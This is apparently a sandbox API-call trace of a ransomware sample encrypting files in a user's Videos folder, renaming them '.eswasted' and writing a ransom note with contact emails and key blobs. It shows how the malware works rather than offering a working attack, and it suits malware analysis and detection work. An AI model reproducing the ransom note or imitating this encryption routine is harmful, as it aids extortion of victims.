1 [0082.233] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\9xIZEDVYZFRgx7.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\9xizedvyzfrgx7.mp4.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0082.233] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0082.234] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x17c60 [0082.234] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17c60) returned 0xb10000 [0082.234] CloseHandle (hObject=0xfc) returned 1 [0082.238] UnmapViewOfFile (lpBaseAddress=0xb10000) returned 1 [0082.238] CloseHandle (hObject=0xf8) returned 1 [0082.238] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ddfd8 [0082.238] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0082.239] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de020 | out: pbBuffer=0x4de020) returned 1 [0082.239] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.287] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0082.287] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0082.287] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.295] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4de1e0 [0082.296] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0082.296] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0082.296] _snwprintf (in: _Dest=0x4e9fd8, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]StcIKxKMdR46wXZq/OVoRzXSKxH/qPSe+cqjwpwQi3cxtLyd0WuiewpE9CAZwzn6\r\nXKZNfXjNX8afZpMrjB4hzvw1IZTtCPnAMDT0yrX8AU+vdcw3p7+pAV9EP504oPlS\r\n71HHhIJltbNVf9Q0r/D5i9CNrJHuDBgwDCnBmCNKc/Z0xPbdIe83oqUMGtreaZHy\r\n9NDJai6JWBaZ0QteSlSM27amIDc5SqGV1rpJm7gQc8XI68CwUjJoiRHBbuTyV2t+\r\nfKMN9Fg4rHAFvzyf95a6APcsEDgEIWnb5yj+YZFwAerAAcl9QbRutHOjqQK7423s\r\naMlAY7hhQPrFBa0lzVhbX9GyyPVTfH8f08YHq2jr4e7tyCSwdh5eWmiEVxjyzEyz\r\n8kBzO1FPr9d8bv4wYkHYvfzOPsIBLMlAdcBNv5vgaQSZA0KHYiLu4YWWnuWtQyzt\r\nPxwpY8RIUShumCGO+eQuxCrVeht/9gOD3jxwLGDSNES6bjWb4HCDoz10QQZ+Zns+\r\ntb45Jc2xzmsA5fFEhSuY0MZCS5eNiEIv0A7hv00ET57gsI/D13Ng2okW3VEFFpQb\r\ng/cpcnNFlS8w93RXSPlGnZuxCeQvJrsMBoVOteDdNY3mXFWJyXyCEdr+i/C/U7LB\r\nGnfF3eLQLGSnPZoXL8K2wmJwRgdColTfGWefgy4XdkY=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.296] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de1e0 | out: hHeap=0x4a0000) returned 1 [0082.296] WriteFile (in: hFile=0x100, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0082.296] SetEndOfFile (hFile=0x100) returned 1 [0082.298] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0082.298] CloseHandle (hObject=0x100) returned 1 [0082.300] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de5f0 | out: hHeap=0x4a0000) returned 1 [0082.300] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e5540 | out: hHeap=0x4a0000) returned 1 [0082.300] _aulldvrm () returned 0x0 [0082.300] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0082.301] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0082.301] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.301] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\FhwKfbgF CPIZDn.avi") returned 80 [0082.301] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2aa) returned 0x4f5f48 [0082.301] lstrcpyW (in: lpString1=0x4f5fe8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.301] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0082.301] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0082.301] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0082.302] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\FhwKfbgF CPIZDn.avi.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\fhwkfbgf cpizdn.avi.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0082.302] WriteFile (in: hFile=0x100, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0082.303] SetEndOfFile (hFile=0x100) returned 1 [0082.304] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.304] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0082.304] lstrcpyW (in: lpString1=0x4f5fe8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.304] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\FhwKfbgF CPIZDn.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\fhwkfbgf cpizdn.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\FhwKfbgF CPIZDn.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\fhwkfbgf cpizdn.avi.eswasted")) returned 1 [0082.304] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\FhwKfbgF CPIZDn.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\fhwkfbgf cpizdn.avi.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0082.305] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0082.305] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x3da2 [0082.305] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3da2) returned 0x2d0000 [0082.305] CloseHandle (hObject=0xf8) returned 1 [0082.307] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0082.307] CloseHandle (hObject=0xfc) returned 1 [0082.307] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d91a8 [0082.307] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0082.308] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0082.308] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.308] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0082.309] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0082.309] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.318] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ef440 [0082.318] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0082.318] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0082.318] _snwprintf (in: _Dest=0x4e9fd8, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]pkrh8zNYsLWcCh0Rfx7w1KBRCvKKDWBh3D4fa2gH3yAShClT0jpaq5jE7iPzXTWk\r\nh711dI8sSkAS77Pj7MJlhQwGBy7kjajO7FiN15ByJsF2jyMa6+NUDvCTMUSGa4Yk\r\npJ+7xxdnNyFj1+pxWszeaJe74TQl5JeCI4ZoUIgAFw2idPlD6IXOLuQLz/gnMxWM\r\nF/CV/4rlSDsngz1pRhzfPTKLDZkaTCPdlIU0qxxDeOc/LEq5Vq+sv+fpqq5H+WzJ\r\nN3EGAcbBs/9R1kVPw6j2ip3iTlN6iFOEIyN2puqJI5hglmDw2ZuujCyhgDgLKTQ1\r\nxpNPS5eLaZcW0bka7M4SuGqixZ3kVQhgrG2Nm0uWfRgB02gooFd5s7kTYNW9G9n8\r\nXwQOhlFgsdSBCMCzUHozmUAyPe5IIfMdLElTLfh+0oN18gWEqAAMe45p59W7aIC/\r\nVOiF5zfYW5RFKYgYqdqlWHe//Pa0WaI4fkyjD7chsXXghB8/qX8dpLK23mr6XCwL\r\ngYbVrR9HyNH8LvQxGzCmEgj+oVl6d8jMOD5P0ENjSDLB3f4tZibn+c3+0tm0ludA\r\nu1NwXu/+PRx/Y3kiDtbyEzrGgdFTJDj7Op0xRucZsfSOy8hluQ0BA8llcsNZVWQh\r\nRIioyevb6iiWGzsu2BEy4Uupwbhg3v/m2sQsT1hub11=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.318] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0082.318] WriteFile (in: hFile=0x100, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0082.318] SetEndOfFile (hFile=0x100) returned 1 [0082.320] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0082.320] CloseHandle (hObject=0x100) returned 1 [0082.323] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f5f48 | out: hHeap=0x4a0000) returned 1 [0082.323] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fc548 | out: hHeap=0x4a0000) returned 1 [0082.323] _aulldvrm () returned 0x0 [0082.323] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0082.324] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0082.324] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.324] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\QOw9vpgiio4_.swf") returned 77 [0082.324] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a4) returned 0x4d91a8 [0082.324] lstrcpyW (in: lpString1=0x4d9242, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.324] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0082.324] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0082.325] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0082.325] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\QOw9vpgiio4_.swf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\qow9vpgiio4_.swf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0082.325] WriteFile (in: hFile=0x100, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0082.326] SetEndOfFile (hFile=0x100) returned 1 [0082.326] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.326] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0082.326] lstrcpyW (in: lpString1=0x4d9242, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.326] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\QOw9vpgiio4_.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\qow9vpgiio4_.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\QOw9vpgiio4_.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\qow9vpgiio4_.swf.eswasted")) returned 1 [0082.327] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\QOw9vpgiio4_.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\qow9vpgiio4_.swf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0082.328] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0082.328] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x1676d [0082.328] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1676d) returned 0xb10000 [0082.328] CloseHandle (hObject=0xfc) returned 1 [0082.332] UnmapViewOfFile (lpBaseAddress=0xb10000) returned 1 [0082.333] CloseHandle (hObject=0xf8) returned 1 [0082.333] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ef440 [0082.333] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0082.340] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef488 | out: pbBuffer=0x4ef488) returned 1 [0082.340] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.340] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0082.341] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0082.341] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.351] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0082.351] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0082.351] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0082.351] _snwprintf (in: _Dest=0x4e9fd8, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]EZNqQ2xkPTDBo4cvkEOKdcAIemtyh3DttHlhqf9gbD8wEUcA7WT2lSiw5qw6gzfK\r\nH2YWNJLeMSxhlX2VhkNXg5eeSDmY4THqt2L3GNgYMSYAsbeQrcQsla8I+cRGJHOU\r\ndCXQD8X6IouoFu0ktIV4d71iNsTGkKJ+w1Zyg/7DknRAXahjDnuy+/aanD/UkR7j\r\nTfNyN7oNebYe363C1nTWPlDVQg3XsfptnzAspqc1BWGtTaMX3Pk8zBplogaYK84h\r\nkadjlXqF/ACHUY5C8YcqNC9x3xS57cIv+w9WVtqkYblQzFDFViZcwd4XNMQZeSeP\r\nFiC3jQfh3zSuFxibjyQS3rS4QV+T01pNEmbKGNEwxFf0O0XG+rpnYB7wZjf5+ABy\r\nMkTLo81326hmgTJjZCFMWU/WvLY12H8u3ZyRiIB5OH1cgP0lPwi+PLAMHw8i3YAB\r\nSoNfB0L10bla5S2m+89Esrg6MLUlCjU13qgAyYWdhu6g19tH75t+h8IrzQELWaSC\r\nQlCb5jXK3MnEEZ1HChAVWrG3u4Istp9+NVzWGQJXszbrWW+XuxfuwyCDRmBYnKPv\r\nhzsudp7AxG8G3mOE2fkd08S7aYeXqN7UFUYk16cOl193nGwj097dUCjnMAPl0znA\r\nDte63PJWAMaJ5/B8gdkjz6CXGk9gHTOKTU5mP+Yf66g=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.351] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0082.351] WriteFile (in: hFile=0x100, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0082.351] SetEndOfFile (hFile=0x100) returned 1 [0082.380] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0082.380] CloseHandle (hObject=0x100) returned 1 [0082.382] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0082.382] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e5638 | out: hHeap=0x4a0000) returned 1 [0082.382] _aulldvrm () returned 0x0 [0082.382] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0082.383] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0082.383] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.383] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\zzr4E1JD7um.swf") returned 76 [0082.383] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4ef700 [0082.383] lstrcpyW (in: lpString1=0x4ef798, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.383] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.383] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0082.384] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.384] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\zzr4E1JD7um.swf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\zzr4e1jd7um.swf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0082.385] WriteFile (in: hFile=0x100, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0082.386] SetEndOfFile (hFile=0x100) returned 1 [0082.386] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.386] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.386] lstrcpyW (in: lpString1=0x4ef798, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.386] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\zzr4E1JD7um.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\zzr4e1jd7um.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\zzr4E1JD7um.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\zzr4e1jd7um.swf.eswasted")) returned 1 [0082.387] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\zzr4E1JD7um.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\zzr4e1jd7um.swf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0082.387] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0082.387] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x5af5 [0082.388] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5af5) returned 0x2d0000 [0082.388] 